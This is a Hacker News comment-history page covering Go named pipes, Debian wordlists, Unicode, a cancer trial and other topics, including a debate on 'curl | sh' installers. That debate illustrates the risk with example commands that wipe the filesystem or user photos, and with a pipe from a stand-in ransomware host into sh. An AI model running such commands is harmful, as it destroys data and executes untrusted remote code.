Hacker News new | past | comments | ask | show | jobs | submit | chipaca's comments login

Step 1, create a named pipe, and open it in non-blocking mode.

...

Unless things have changed a lot in this domain in the last few years, that won't work reliably _anywhere_.


Go team does acknowledge [1] it as a bug, so there is some point here

However, that said, I wonder if OP (duckdb) could have written their solution [2] differently. Shouldn't they be able to select from a Pipe as well as Error channel simultaneously? (similar to how they are doing it inside here [3]). If not, I would have create a go-routine that does blocking read on the Pipe and then pass it on to another channel to select on.

[1] https://github.com/golang/go/issues/66239

[2] https://github.com/scratchdata/scratchdata/blob/7c1a0fcd0e20...

[3] https://github.com/scratchdata/scratchdata/blob/7c1a0fcd0e20...


I’m not sure you can. Both the Open() and Read() calls will block. You can select() on a pipe but not on open. I haven’t checked to see if you can select on a non blocking fd though. This is what the go wrappers do behind the scenes.


Er, whyever wouldn't it? On Linux it certainly works as expected, and it seems that it works fine on OS X when avoiding the broken Go shims.


I seem to remember non-blocking io with named pipes was unreliable, in the sense that the test suite of whatever-it-was (memory is reeealy sketchy, this was tens of years ago) would fail randomly often enough that we had to throw the easy solution away and do actual networking.

A bit like the .signature named pipe from fortune thing, where sometimes you got two signatures and sometimes none? Anybody remember that?


Is this what you're referring to?

signature file can't be a named pipe (or /proc/uptime) https://bugzilla.mozilla.org/show_bug.cgi?id=62993

can't attach signature from pipe (fifo) https://bugzilla.mozilla.org/show_bug.cgi?id=163831


From the looks of it that's been generated by `circo`, which is part of GraphViz and describes itself as a “filter for circular layout of graphs” and

       circo  draws graphs using a circular layout (see Six and Tollis, GD '99
       and ALENEX '99, and Kaufmann and Wiese, GD '02.)  The  tool  identifies
       biconnected  components  and draws the nodes of the component on a cir‐
       cle. The block‐cutpoint tree is then laid out using a recursive  radial
       algorithm.  Edge  crossings within a circle are minimized by placing as
       many edges on the circle's perimeter as possible.   In  particular,  if
       the  component is outerplanar, the component will have a planar layout.
       If a node belongs to multiple non‐trivial biconnected  components,  the
       layout puts the node in one of them. By default, this is the first non‐
       trivial component found in the search from the root component.


Doing a bit more digging, it's using cytoscape[0] which is similar to graphviz. If you search your favorite search engine with "Cytoscape Session Viewer", you'll find many websites displaying the same type of graphs (select layout: circle).

FYI, circo doesn't always output a circle. I recently created https://github.com/MegaManSec/SSH-Snake/blob/main/tools/SSH-... using circo.

[0] https://cytoscape.org/


    $ apt-cache search 'words for /usr/share/dict' | sed -e 's/^[^ ]* - //; s/ dictionary words.*//' | sort -u
    American English
    British English
    Bulgarian
    Canadian English
    Catalan
    Esperanto
    French
    German medical
    Irish (Gaeilge)
    Italian
    Manx Gaelic
    Polish
    Spanish
    Swedish
    Ukrainian


Not every word list package has "words for /usr/share/dict" in the description.

  $ grep-aptavail -wF Provides wordlist -s Package,Description | tbl-dctrl 
  +===================+=======================================================+
  | Package           | Description                                           |
  +-------------------+-------------------------------------------------------+
  | wbulgarian        | Bulgarian dictionary words for /usr/share/dict        |
  | wbrazilian        | Brazilian Portuguese wordlist                         |
  | wdanish           | The Comprehensive Danish Dictionary (DSDO) - wordlist |
  | wdutch            | list of Dutch words                                   |
  | wesperanto        | Esperanto dictionary words for /usr/share/dict        |
  | wogerman          | Traditional German wordlist                           |
  | wngerman          | New German orthography wordlist                       |
  | wswiss            | Swiss (German) orthography wordlist                   |
  | wpolish           | Polish dictionary words for /usr/share/dict           |
  | wfaroese          | Faroese dictionary / wordlist                         |
  | wgalician-minimos | Wordlist for Galician (minimos)                       |
  | wukrainian        | Ukrainian dictionary words for /usr/share/dict        |
  | wportuguese       | European Portuguese wordlist                          |
  | wgerman-medical   | German medical dictionary words for /usr/share/dict   |
  | miscfiles         | Dictionaries and other interesting files              |
  | wnorwegian        | Norwegian word list                                   |
  | wamerican         | American English dictionary words for /usr/share/dict |
  | wamerican-huge    | American English dictionary words for /usr/share/dict |
  | wamerican-insane  | American English dictionary words for /usr/share/dict |
  | wamerican-large   | American English dictionary words for /usr/share/dict |
  | wamerican-small   | American English dictionary words for /usr/share/dict |
  | wbritish          | British English dictionary words for /usr/share/dict  |
  | wbritish-huge     | British English dictionary words for /usr/share/dict  |
  | wbritish-insane   | British English dictionary words for /usr/share/dict  |
  | wbritish-large    | British English dictionary words for /usr/share/dict  |
  | wbritish-small    | British English dictionary words for /usr/share/dict  |
  | wcanadian         | Canadian English dictionary words for /usr/share/dict |
  | wcanadian-huge    | Canadian English dictionary words for /usr/share/dict |
  | wcanadian-insane  | Canadian English dictionary words for /usr/share/dict |
  | wcanadian-large   | Canadian English dictionary words for /usr/share/dict |
  | wcanadian-small   | Canadian English dictionary words for /usr/share/dict |
  | wcatalan          | Catalan dictionary words for /usr/share/dict          |
  | wswedish          | Swedish dictionary words for /usr/share/dict          |
  | wfrench           | French dictionary words for /usr/share/dict           |
  | witalian          | Italian dictionary words for /usr/share/dict/         |
  | wspanish          | Spanish dictionary words for /usr/share/dict          |
  +===================+=======================================================+


I mean, yes, but so does the Austral and it lasted less than Bitcoin has already.


Yet Klingon script was rejected. Unicode character acceptance seems to be entirely arbitrary. Gotta make space for all the new poop emoji somehow I suppose.


Bitcoin symbol is used far more than Klingon characters. Simple as that.

And anyone Klingon is declared for use in the private use area, like other niche languages.


why is it still acceptable to suggest something like

  curl -sLfS https://cli.openfaas.com | sudo sh

?


Can you explain why this is so unacceptable? Couldn't you inspect the contents at the url before you executed the command? What I've seen in some cases is, run the curl command to download the file and then execute it. I don't see much difference. This is a serious question, not arguing that this is the best way.


You answered the question yourself.

The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do.

For example, maybe the URL contents is "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomeware-encryptor.example.com | sh".

No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.


Has anyone ever in the history of complaining about this type of script run one and had it nuke their computer? What are the odds that the domains and companies and projects that use this have built their online presence just to pwn your computer for the lulz or that they have been compromised by a malicious actor without being detected at the same time you run the installer, and no one anywhere said anything?

How about if instead we exercise critical thinking and make our own assessment of the risk and act accordingly? Why would you choose not to pipe a shell script from a site you don’t trust but execute their installer instead?

If you don’t want to pipe it, download it and read it first.


Hey, I use "curl | sh" myself.

But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk.

On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine.

The GPP asks what's the security difference between inspecting and not inspecting the downloaded command.

> or that they have been compromised by a malicious actor without being detected at the same time you run the installer

Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh".

However, replacing an installer with one that looks the same but is actually malicious, is a lot more work than replacing a blind script with one that looks the same but is actually malicious.

And the risk of a malicious blind script going unnoticed is higher than a compromised installer when the SHA256 is shown to be checked alongside the latter's link, simply because the attacker would need to change two places instead of one. Yes I do check hashes of installers when that's possible and there isn't a package manager already doing so. It's a good idea anyway in case of a corrupted download file, which I do see from time to time.


> had it nuke their computer?

Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means. Like you curl an install script and then it goes and curls a whole bunch of other stuff.

Massive PITA to track all the changes that it made and uninstall it.

Package managers were made for a reason, and people should use them.


Since the shell script in question installs OpenFAAS, unless you read all the source code for OpenFAAS too, then really you still have no idea if it's going to do something malicious or not.


What would be cool is a command line util that you could pipe the script to for a safety inspection.

Something like: curl https://ransomeware-encryptor.example.com | script-checker | sh


    alias script-checker="echo 'echo unsafe'"


A reasonable attacker would provide different file to curl and to the browser so you inspect something else then you run and don't even have a copy of the file.


Updated with two other options. These are documented in the existing link, but made clearer because of this comment.


Because it is probably too much work to correctly package the thing for multiple operating systems.


It never was acceptable in polite society, but I find it's a useful signal to indicate what software to avoid.


Good question, I personally find gVisor-like [0] snippets that suggests to copy & paste in order to install the program as the most pleasant way:

   (
     set -e
     URL=https://storage.googleapis.com/gvisor/releases/release/latest
     wget ${URL}/runsc ${URL}/runsc.sha512
     sha512sum -c runsc.sha512
     rm -f runsc.sha512
     sudo mv runsc /usr/local/bin
     sudo chmod a+rx /usr/local/bin/runsc
   )
Thanks to the used parentheses it feels like a "one-liner" script. Is there any better way to share installation script?

[0]: https://gvisor.dev/docs/user_guide/install/


Yes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts, they give a crap across your entire system and it's not obvious how to get rid of it if you decide you don't want it.


Actually, deb is way how to "distribute" software not to "just" install something. Let's say I would like to install Docker I will need to type following commands in case of Ubuntu:

  (
      sudo apt-get update
      sudo apt-get -y install \
          apt-transport-https \
          ca-certificates \
          curl \
          gnupg-agent \
          software-properties-common
      curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
      sudo apt-key fingerprint 0EBFCD88
      sudo add-apt-repository -y \
          "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
          $(lsb_release -cs) \
          stable"
      sudo apt-get update
      sudo apt-get install -y docker-ce docker-ce-cli containerd.io
  )
How would `.deb` help you to install/uninstall such software? Do mind mean embedding some scripts to add third-party repository and then install your app?

Even then, what it actually changes from the script I have already suggested in previous post? It is still about downloading two files (signature and packaged application) and install it (e.g. via dpkg --install).


Why not just:

    sudo apt install docker.io
And for more up-to-date versions, why doesn't Docker create a ppa? At most it should be something of the sort of:

    sudo apt-add-repository ppa:docker/docker
    sudo apt install docker
That's how these things were intended to work.


PPA's are just Ubuntu's way to make creating APT repositories easier. Those steps above are the longer way of achieving the same result without relying on Canonical's infrastructure. The same instructions can also be used with minor changes to also work on Debian and Raspbian (and could probably work on most other Debian-based distros).

Those steps above are covering all the bases for Debian-based distros, adding the signing keys Docker uses for their packages, and then finally inst


You can just download the .deb files from https://download.docker.com/linux/ubuntu/dists/focal/pool/st... and install them. No need to add another repo.


Erm, no. I think I haven't been clear in my first post. I am not asking about "how to install apt package", but how to provide a universal recipe to provide 3rd-party software as handy installation script. What you suggest is how to download and install few debs from a website. When I writing such script, I don't trust the host name "just like that" as you suggest. It can be malformed or point totally to different host that we would expect.


It installs a single static binary, hardly sprawling all over your system. It's also available in brew, AUR, and a bunch of other places.


Linux package management systems are old enough to purchase alcohol in the United States.


Of course they are but they are meant for more sophisticated purposes, (i.e. install, update, reinstall, remove app or even purge program with user data, etc.) and all of that logic is usually covered with signature checking with other security-oriented algorithms. I agree, I find apt/dnf/pacman/apk/xbps are great, but...

In case of Ubuntu, in order to install some deb-based software you usually have to bring your own script (this is what I call "copy & paste installation script") to add third-party repository that contains given package.


well, the definition of a linux distribution is a repository + a package manager.

https://en.wikipedia.org/wiki/Linux_distribution

:)


In mice.


Have you clicked on the link? It's a result from an RCT in women with locally advanced breast cancer.


In his defence the abstract starts by talking about mice, which is a bit confusing. Sure they talk about patients as well but it's not immediately clear that mice can't be considered patients. If you read on it becomes clear though!


The title saying it's a multi-centre phase 2 trial makes it extremely clear. You don't do those in animals.


On the contrary. It worked in mice, so they tried it on humans; turns out it works in humans too.


The first sentence was misleading to me as well (it does refer to mice, but only as a "was also effective on mice" sense), but the study was done on humans.


from https://en.wikipedia.org/wiki/Foulness_Island#Conservation

> The island's name is derived from the Old English fugla-næss, with fugla (modern "fowl") meaning "of birds" and naess being the Germanic word for promontory


I've seen nothing about a "1 hour maximum" rule; where are you getting that from?


It's not in law, but it was advised by Michael Gove[1]: "I would have thought for most people a walk of up to an hour, a run of 30 minutes or a cycle ride of between that, depending on their level of fitness, is appropriate."

I guess ultimately it's up to the individual - the longer you exercise for and the greater the area you cover, I guess the higher the risk of you spreading the virus if you have it or getting it is. But I think the government are crediting people with some common sense here, e.g. if you are in the middle of nowhere and don't see another person, you can probably justify exercising for longer to yourself more easily than in a crowded city.

FWIW, I've been doing about 30 mins cycling outside most week days in London, around an hour (sometimes 90 minutes) at the weekend. Would love to go further or more times a day, but feels like we have to do our bit to help, while also staying sane, personally I feel comfortable with this level.

[1] random link from Google, https://www.runnersworld.com/uk/news/a31973975/coronavirus-u...


why do you have male/female (primero/primera) and then female/male (1ª/1º)?


Just to nitpick: grammatical genders are "masculine" and "feminine" (not male and female)


Oops, I got it backwards. I'll fix it when i get a chance. Thanks for noticing!


FWIW we had to move away from python in the project I was working on because just waiting for the help took more than 15 seconds (IIRC) on a beaglebone black.


Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: